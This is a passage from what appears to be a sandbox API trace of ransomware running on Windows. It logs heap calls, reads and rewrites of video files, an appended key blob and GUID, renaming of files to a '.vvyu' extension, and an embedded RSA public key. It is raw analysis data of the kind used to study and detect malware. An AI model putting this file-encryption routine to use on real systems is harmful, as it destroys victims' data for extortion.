hHeap=0x2c0000) returned 1 [0192.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0192.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5f90) returned 0x2af5168 [0192.054] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0192.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0192.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0192.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3a08 [0192.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60b0 [0192.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3a50 [0192.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60c8 [0192.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60f8 [0192.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6158 [0192.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6110 [0192.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0192.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0192.055] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0192.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0192.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60f8 | out: hHeap=0x2c0000) returned 1 [0192.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6110 | out: hHeap=0x2c0000) returned 1 [0192.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6158 | out: hHeap=0x2c0000) returned 1 [0192.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0192.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6158 [0192.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0192.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6110 [0192.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0192.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae60f8 [0192.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0192.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0192.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0192.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0192.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0192.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0192.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0192.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0192.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6110 | out: hHeap=0x2c0000) returned 1 [0192.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60f8 | out: hHeap=0x2c0000) returned 1 [0192.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0192.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6158 | out: hHeap=0x2c0000) returned 1 [0192.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0192.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0192.058] GetCurrentThreadId () returned 0x5d8 [0192.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0192.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae6f48 [0192.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0192.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0192.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0192.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0192.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0192.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0192.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.059] GetCurrentThreadId () returned 0x5d8 [0192.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0192.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0192.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0192.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0192.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0192.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0192.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6158 [0192.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0192.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0192.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0192.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0192.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0192.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0192.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0192.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60f8 [0192.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0192.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0192.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0192.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0192.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0192.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6110 [0192.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0192.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0192.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0192.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60e0 [0192.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0192.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6170 [0192.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0192.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6140 [0192.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6128 [0192.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6188 [0192.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6128 | out: hHeap=0x2c0000) returned 1 [0192.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6128 [0192.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6140 | out: hHeap=0x2c0000) returned 1 [0192.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0192.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0192.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0192.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60f8 | out: hHeap=0x2c0000) returned 1 [0192.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae60f8 [0192.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0192.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6158 | out: hHeap=0x2c0000) returned 1 [0192.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0192.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6188 | out: hHeap=0x2c0000) returned 1 [0192.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0192.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0192.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0192.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60f8 | out: hHeap=0x2c0000) returned 1 [0192.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0192.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0192.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0192.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0192.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0192.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0192.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0192.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0192.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0192.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0192.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6128 | out: hHeap=0x2c0000) returned 1 [0192.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6170 | out: hHeap=0x2c0000) returned 1 [0192.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0192.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6110 | out: hHeap=0x2c0000) returned 1 [0192.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60e0 | out: hHeap=0x2c0000) returned 1 [0192.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0192.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0192.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0192.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60c8 | out: hHeap=0x2c0000) returned 1 [0192.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3a50 | out: hHeap=0x2c0000) returned 1 [0192.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0192.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0192.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0192.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0192.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0192.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0192.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0192.070] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x5f8d, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x5f8d, lpOverlapped=0x0) returned 1 [0192.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0192.071] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f92, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.071] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0192.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0192.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0192.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0192.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0192.073] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0192.073] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.073] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.073] CloseHandle (hObject=0x584) returned 1 [0192.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0192.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0192.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0192.075] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\onXJrQ0LQmJjW.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\onxjrq0lqmjjw.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\onXJrQ0LQmJjW.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\onxjrq0lqmjjw.avi.vvyu")) returned 1 [0192.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.077] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0192.080] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x523f7f0, ftCreationTime.dwHighDateTime=0x1d89f6b, ftLastAccessTime.dwLowDateTime=0xddfb6750, ftLastAccessTime.dwHighDateTime=0x1d8a3d2, ftLastWriteTime.dwLowDateTime=0xddfb6750, ftLastWriteTime.dwHighDateTime=0x1d8a3d2, nFileSizeHigh=0x0, nFileSizeLow=0x12367, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P0jIQb7.avi", cAlternateFileName="")) returned 1 [0192.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3a50 [0192.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ee78 [0192.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3a50 | out: hHeap=0x2c0000) returned 1 [0192.081] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\P0jIQb7.avi") returned=".avi" [0192.081] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\P0jIQb7.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\p0jiqb7.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.081] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=74599) returned 1 [0192.082] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0192.086] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x12341, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.086] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0192.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.088] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.088] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x12367, lpOverlapped=0x0) returned 1 [0192.090] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0192.090] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.090] lstrlenA (lpString="-----BEGIN PUBLIC 